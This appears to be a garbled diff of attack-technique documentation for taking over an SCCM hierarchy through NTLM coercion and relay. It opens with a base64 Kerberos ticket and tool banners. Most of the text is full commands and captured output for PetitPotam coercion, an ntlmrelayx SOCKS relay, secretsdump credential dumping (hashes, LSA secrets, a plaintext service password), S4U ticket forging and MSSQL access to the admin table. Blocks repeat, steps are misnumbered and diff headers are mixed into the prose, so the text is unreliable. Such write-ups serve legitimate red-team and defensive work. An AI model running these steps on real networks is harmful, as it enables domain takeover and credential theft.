RS1TRVJWRVIkowcDBQBAoQAApREYDzIwMjQwMzA1MTA1MjQ4WqYRGA8yMDI0MDMwNTIwNTIyNlqnERgPMjAyNDAzMTIxMDUyMjZaqA8bDU1BWVlIRU0uTE9DQUypMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMz
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
v2.3.0
[*] Action: Import Ticket
[+] Ticket successfully imported!
```
[*] Action: Import Ticket
[+] Ticket successfully imported!
```
12. Launch SQL Server Management Studio, connect to the site database, and grant the "Full Administrator" role to an arbitrary account (see TAKEOVER-1):
11. Launch SQL Server Management Studio, connect to the site database, and grant the "Full Administrator" role to an arbitrary account (see TAKEOVER-1):
```
C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe
```
Note that it may be possible to conduct this attack entirely from the site database server if the attacker can force the use of Kerberos authentication locally (e.g., using tradecraft similar to KrbRelayUp).
```
C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe
```
Note that it may be possible to conduct this attack entirely from the site database server if the attacker can force the use of Kerberos authentication locally (e.g., using tradecraft similar to KrbRelayUp).
### Linux
1. Start `ntlmrelayx` with a SOCKS proxy
```
└─# ntlmrelayx.py -t smb://10.10.100.8 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
```
└─# ntlmrelayx.py -t smb://10.10.100.8 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>
```
2. Coerce auth
```
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 sccm.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:sccm.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
```
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 sccm.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:sccm.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
3. Receive connection on relay server
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.8
[*] Authenticating against smb://10.10.100.8 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.8(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ----------- --------- ----------- ----
SMB 10.10.100.8 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.8
[*] Authenticating against smb://10.10.100.8 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.8(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ----------- --------- ----------- ----
SMB 10.10.100.8 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
4. Proxy in secretsdump
```
└─# proxychains secretsdump.py 'lab/sccm$@10.10.100.8' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
```
└─# proxychains secretsdump.py 'lab/sccm$@10.10.100.8' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.8:445 ... OK
[*] Target system bootKey: 0xf81f8be7c4c43d38858d17318ffa025e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:26f78b6fd483ddd6c54497e6ffbffbc2:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-10 00:27:04)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-10 02:33:07)
INTERNAL.LAB/sqlsvc:$DCC2$10240#sqlsvc#e12866f9a8777ddbe39ae1380ac6346c: (2024-02-23 22:25:28)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-20 03:20:11)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-22 21:51:57)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-23 00:31:30)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-03-01 17:04:52)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
LAB\SQL$:aes256-cts-hmac-sha1-96:8d15fd9651116c18930d6244351147f367cdb25b163acf8e112139c5462ba832
LAB\SQL$:aes128-cts-hmac-sha1-96:340346aa26b46b5a7be81b478c3e0d27
LAB\SQL$:des-cbc-md5:2a80e6012a02b586
LAB\SQL$:plain_password_hex:2f007700410042003b0047005d00720044006d00370047007700390073003200690035002b0054005e0031004e005c004300450037003c004d005100560035003c0043005c003a00380050002f004900400044004b0069002d00740026003d0043004b004e006b0061005000690059005000480049004c0065005e00600054003c006f0048003d004600690067005d004d004000670070005d005800370078006a0043003a0047003f0034006b00640056002e004500440052002600200049006900230047005800620058002200510069006800220032003e007400360043005d00780032002f002800260061004300
LAB\SQL$:aad3b435b51404eeaad3b435b51404ee:e0173405c3e9c5ecaba657bc628889ce:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb5ca959a9a6ed97054bdae10d23275b776378b3d
dpapi_userkey:0x49206429f367c2e332d88015e0405e68646fe959
[*] NL$KM
0000 39 47 80 9E 3B 1E F2 D0 3C 1F 6D C5 E3 77 A9 9C 9G..;...<.m..w..
0010 F4 8A EF DD 7E 4D 10 2D 1E 59 F9 B3 FB FE 1F E9 ....~M.-.Y......
0020 86 4E 14 EF 0D E8 0D 8A 7C 85 B8 66 A4 C9 DD DC .N......|..f....
0030 CE DD F1 02 33 72 BD 1C CF 1E 53 F1 28 F4 5B AE ....3r....S.(.[.
NL$KM:3947809e3b1ef2d03c1f6dc5e377a99cf48aefdd7e4d102d1e59f9b3fbfe1fe9864e14ef0de80d8a7c85b866a4c9dddcceddf1023372bd1ccf1e53f128f45bae
[*] _SC_MSSQLSERVER
LAB\sqlsvc:P@ssw0rd
[*] Cleaning up...
```
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.8:445 ... OK
[*] Target system bootKey: 0xf81f8be7c4c43d38858d17318ffa025e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:26f78b6fd483ddd6c54497e6ffbffbc2:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-10 00:27:04)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-10 02:33:07)
INTERNAL.LAB/sqlsvc:$DCC2$10240#sqlsvc#e12866f9a8777ddbe39ae1380ac6346c: (2024-02-23 22:25:28)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-20 03:20:11)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-22 21:51:57)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-23 00:31:30)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-03-01 17:04:52)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
LAB\SQL$:aes256-cts-hmac-sha1-96:8d15fd9651116c18930d6244351147f367cdb25b163acf8e112139c5462ba832
LAB\SQL$:aes128-cts-hmac-sha1-96:340346aa26b46b5a7be81b478c3e0d27
LAB\SQL$:des-cbc-md5:2a80e6012a02b586
LAB\SQL$:plain_password_hex:2f007700410042003b0047005d00720044006d00370047007700390073003200690035002b0054005e0031004e005c004300450037003c004d005100560035003c0043005c003a00380050002f004900400044004b0069002d00740026003d0043004b004e006b0061005000690059005000480049004c0065005e00600054003c006f0048003d004600690067005d004d004000670070005d005800370078006a0043003a0047003f0034006b00640056002e004500440052002600200049006900230047005800620058002200510069006800220032003e007400360043005d00780032002f002800260061004300
LAB\SQL$:aad3b435b51404eeaad3b435b51404ee:e0173405c3e9c5ecaba657bc628889ce:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb5ca959a9a6ed97054bdae10d23275b776378b3d
dpapi_userkey:0x49206429f367c2e332d88015e0405e68646fe959
[*] NL$KM
0000 39 47 80 9E 3B 1E F2 D0 3C 1F 6D C5 E3 77 A9 9C 9G..;...<.m..w..
0010 F4 8A EF DD 7E 4D 10 2D 1E 59 F9 B3 FB FE 1F E9 ....~M.-.Y......
0020 86 4E 14 EF 0D E8 0D 8A 7C 85 B8 66 A4 C9 DD DC .N......|..f....
0030 CE DD F1 02 33 72 BD 1C CF 1E 53 F1 28 F4 5B AE ....3r....S.(.[.
NL$KM:3947809e3b1ef2d03c1f6dc5e377a99cf48aefdd7e4d102d1e59f9b3fbfe1fe9864e14ef0de80d8a7c85b866a4c9dddcceddf1023372bd1ccf1e53f128f45bae
[*] _SC_MSSQLSERVER
LAB\sqlsvc:P@ssw0rd
[*] Cleaning up...
```
5. Get TGT for SQL service account running the site database
```
└─# getTGT.py internal.lab/sqlsvc:"P@ssw0rd"
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
```
└─# getTGT.py internal.lab/sqlsvc:"P@ssw0rd"
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Saving ticket in sqlsvc.ccache
```
[*] Saving ticket in sqlsvc.ccache
```
6. S4U
```
└─# python3 gets4uticket.py kerberos+ccache://internal.lab\\sqlsvc:sqlsvc.ccache@dc01.internal.lab MSSQLSvc/sql.internal.lab:1433@internal.lab sccm\$@internal.lab sccm_s4u.ccache -v
2024-03-01 21:31:03,310 minikerberos INFO Trying to get SPN with sccm$@internal.lab for MSSQLSvc/sql.internal.lab:1433@internal.lab
INFO:minikerberos:Trying to get SPN with sccm$@internal.lab for MSSQLSvc/sql.internal.lab:1433@internal.lab
2024-03-01 21:31:05,126 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-03-01 21:31:05,127 minikerberos INFO Done!
INFO:minikerberos:Done!
```
```
└─# python3 gets4uticket.py kerberos+ccache://internal.lab\\sqlsvc:sqlsvc.ccache@dc01.internal.lab MSSQLSvc/sql.internal.lab:1433@internal.lab sccm\$@internal.lab sccm_s4u.ccache -v
2024-03-01 21:31:03,310 minikerberos INFO Trying to get SPN with sccm$@internal.lab for MSSQLSvc/sql.internal.lab:1433@internal.lab
INFO:minikerberos:Trying to get SPN with sccm$@internal.lab for MSSQLSvc/sql.internal.lab:1433@internal.lab
2024-03-01 21:31:05,126 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-03-01 21:31:05,127 minikerberos INFO Done!
INFO:minikerberos:Done!
```
7. Auth to MSSQL
```
└─# KRB5CCNAME=sccm_s4u.ccache mssqlclient.py internal.lab/sccm\$@sql.internal.lab -k -no-pass -windows-auth
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
```
└─# KRB5CCNAME=sccm_s4u.ccache mssqlclient.py internal.lab/sccm\$@sql.internal.lab -k -no-pass -windows-auth
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (LAB\sccm$ dbo@master)> use CM_LAB
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: CM_LAB
[*] INFO(SQL): Line 1: Changed database context to 'CM_LAB'.
SQL (LAB\sccm$ dbo@CM_LAB)> select * from RBAC_Admins;
AdminID AdminSID LogonName DisplayName IsGroup IsDeleted CreatedBy CreatedDate ModifiedBy ModifiedDate SourceSite DistinguishedName AccountType
-------- ----------------------------------------------------------- ----------------- ----------- ------- --------- ----------------- ----------- ----------------- ------------ ---------- ----------------- -----------
16777217 b'0105000000000005150000005407a9ee65b1f9b01fff385ef4010000' LAB\Administrator NULL 0 0 LAB\administrator 2024-02-10 01:21:52 LAB\administrator 2024-02-10 01:21:52 LAB NULL NULL
16777220 b'0105000000000005150000005407a9ee65b1f9b01fff385e59040000' LAB\lowpriv lowpriv 0 0 LAB\administrator 2024-02-29 21:50:54 LAB\administrator 2024-02-29 21:50:54 LAB 128
SQL (LAB\sccm$ dbo@CM_LAB)>
```
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (LAB\sccm$ dbo@master)> use CM_LAB
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: CM_LAB
[*] INFO(SQL): Line 1: Changed database context to 'CM_LAB'.
SQL (LAB\sccm$ dbo@CM_LAB)> select * from RBAC_Admins;
AdminID AdminSID LogonName DisplayName IsGroup IsDeleted CreatedBy CreatedDate ModifiedBy ModifiedDate SourceSite DistinguishedName AccountType
-------- ----------------------------------------------------------- ----------------- ----------- ------- --------- ----------------- ----------- ----------------- ------------ ---------- ----------------- -----------
16777217 b'0105000000000005150000005407a9ee65b1f9b01fff385ef4010000' LAB\Administrator NULL 0 0 LAB\administrator 2024-02-10 01:21:52 LAB\administrator 2024-02-10 01:21:52 LAB NULL NULL
16777220 b'0105000000000005150000005407a9ee65b1f9b01fff385e59040000' LAB\lowpriv lowpriv 0 0 LAB\administrator 2024-02-29 21:50:54 LAB\administrator 2024-02-29 21:50:54 LAB 128
SQL (LAB\sccm$ dbo@CM_LAB)>
```
## References
- Elad Shamir, Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory, https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
- Charlie Clark, Revisiting 'Delegate 2 Thyself', https://exploit.ph/revisiting-delegate-2-thyself.html
- Charlie Bromberg, S4U2self Abuse, https://www.thehacker.recipes/a-d/movement/kerberos/delegations/s4u2self-abuse
- Elad Shamir, [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
- Charlie Clark, [Revisiting 'Delegate 2 Thyself'](https://exploit.ph/revisiting-delegate-2-thyself.html)
- Charlie Bromberg, [S4U2self Abuse](https://www.thehacker.recipes/a-d/movement/kerberos/delegations/s4u2self-abuse)
@@ -1,7 +1,7 @@
# TAKEOVER-3
## Description
Hierarchy takeover via NTLM coercion and relay to SMB on remote site database
Hierarchy takeover via NTLM coercion and relay to HTTP on AD CS
## MITRE ATT&CK TTPs
- [TA0004](https://attack.mitre.org/tactics/TA0004) - Privilege Escalation
@@ -15,189 +15,17 @@ Hierarchy takeover via NTLM coercion and relay to SMB on remote site database
## Impact
## Subtechniques
- TAKEOVER-2.1: Coerce primary site server
- TAKEOVER-2.2: Coerce passive site server
## Defensive IDs
- [PREVENT-1: Patch SCCM Site Server with KB15599094](../defense-techniques/PREVENT/PREVENT-1/prevent-1_description.md)
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-3.1: Coerce primary site server
- TAKEOVER-3.2: Coerce passive site server
## Examples
The steps to execute TAKEOVER-2.1 and TAKEOVER-2.2 are mostly the same except that a different system is targeted for coercion of NTLM authentication.
1. On the attacker relay server, start `ntlmrelayx`, targeting the IP address of the site database server:
### Windows
1.
### Linux
1. Start `ntlmrelayx` with a SOCKS proxy
```
└─# ntlmrelayx.py -t smb://10.10.100.8 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>
```
2. Coerce auth
```
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 sccm.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:sccm.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
3. Receive connection on relay server
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.8
[*] Authenticating against smb://10.10.100.8 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.8(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ----------- --------- ----------- ----
SMB 10.10.100.8 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
4. Proxy in secretsdump
```
└─# proxychains secretsdump.py 'lab/sccm$@10.10.100.8' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.8:445 ... OK
[*] Target system bootKey: 0xf81f8be7c4c43d38858d17318ffa025e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:26f78b6fd483ddd6c54497e6ffbffbc2:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-10 00:27:04)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-10 02:33:07)
INTERNAL.LAB/sqlsvc:$DCC2$10240#sqlsvc#e12866f9a8777ddbe39ae1380ac6346c: (2024-02-23 22:25:28)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-20 03:20:11)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-22 21:51:57)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-23 00:31:30)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-03-01 17:04:52)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
LAB\SQL$:aes256-cts-hmac-sha1-96:8d15fd9651116c18930d6244351147f367cdb25b163acf8e112139c5462ba832
LAB\SQL$:aes128-cts-hmac-sha1-96:340346aa26b46b5a7be81b478c3e0d27
LAB\SQL$:des-cbc-md5:2a80e6012a02b586
LAB\SQL$:plain_password_hex:2f007700410042003b0047005d00720044006d00370047007700390073003200690035002b0054005e0031004e005c004300450037003c004d005100560035003c0043005c003a00380050002f004900400044004b0069002d00740026003d0043004b004e006b0061005000690059005000480049004c0065005e00600054003c006f0048003d004600690067005d004d004000670070005d005800370078006a0043003a0047003f0034006b00640056002e004500440052002600200049006900230047005800620058002200510069006800220032003e007400360043005d00780032002f002800260061004300
LAB\SQL$:aad3b435b51404eeaad3b435b51404ee:e0173405c3e9c5ecaba657bc628889ce:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb5ca959a9a6ed97054bdae10d23275b776378b3d
dpapi_userkey:0x49206429f367c2e332d88015e0405e68646fe959
[*] NL$KM
0000 39 47 80 9E 3B 1E F2 D0 3C 1F 6D C5 E3 77 A9 9C 9G..;...<.m..w..
0010 F4 8A EF DD 7E 4D 10 2D 1E 59 F9 B3 FB FE 1F E9 ....~M.-.Y......
0020 86 4E 14 EF 0D E8 0D 8A 7C 85 B8 66 A4 C9 DD DC .N......|..f....
0030 CE DD F1 02 33 72 BD 1C CF 1E 53 F1 28 F4 5B AE ....3r....S.(.[.
NL$KM:3947809e3b1ef2d03c1f6dc5e377a99cf48aefdd7e4d102d1e59f9b3fbfe1fe9864e14ef0de80d8a7c85b866a4c9dddcceddf1023372bd1ccf1e53f128f45bae
[*] _SC_MSSQLSERVER
LAB\sqlsvc:P@ssw0rd
[*] Cleaning up...
```
5. Get TGT for SQL service account running the site database
```
└─# getTGT.py internal.lab/sqlsvc:"P@ssw0rd"
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Saving ticket in sqlsvc.ccache
```
6. S4U
```
└─# python3 gets4uticket.py kerberos+ccache://internal.lab\\sqlsvc:sqlsvc.ccache@dc01.internal.lab MSSQLSvc/sql.internal.lab:1433@internal.lab sccm\$@internal.lab sccm_s4u.ccache -v
2024-03-01 21:31:03,310 minikerberos INFO Trying to get SPN with sccm$@internal.lab for MSSQLSvc/sql.internal.lab:1433@internal.lab
INFO:minikerberos:Trying to get SPN with sccm$@internal.lab for MSSQLSvc/sql.internal.lab:1433@internal.lab
2024-03-01 21:31:05,126 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-03-01 21:31:05,127 minikerberos INFO Done!
INFO:minikerberos:Done!
```
7. Auth to MSSQL
```
└─# KRB5CCNAME=sccm_s4u.ccache mssqlclient.py internal.lab/sccm\$@sql.internal.lab -k -no-pass -windows-auth
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (LAB\sccm$ dbo@master)> use CM_LAB
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: CM_LAB
[*] INFO(SQL): Line 1: Changed database context to 'CM_LAB'.
SQL (LAB\sccm$ dbo@CM_LAB)> select * from RBAC_Admins;
AdminID AdminSID LogonName DisplayName IsGroup IsDeleted CreatedBy CreatedDate ModifiedBy ModifiedDate SourceSite DistinguishedName AccountType
-------- ----------------------------------------------------------- ----------------- ----------- ------- --------- ----------------- ----------- ----------------- ------------ ---------- ----------------- -----------
16777217 b'0105000000000005150000005407a9ee65b1f9b01fff385ef4010000' LAB\Administrator NULL 0 0 LAB\administrator 2024-02-10 01:21:52 LAB\administrator 2024-02-10 01:21:52 LAB NULL NULL
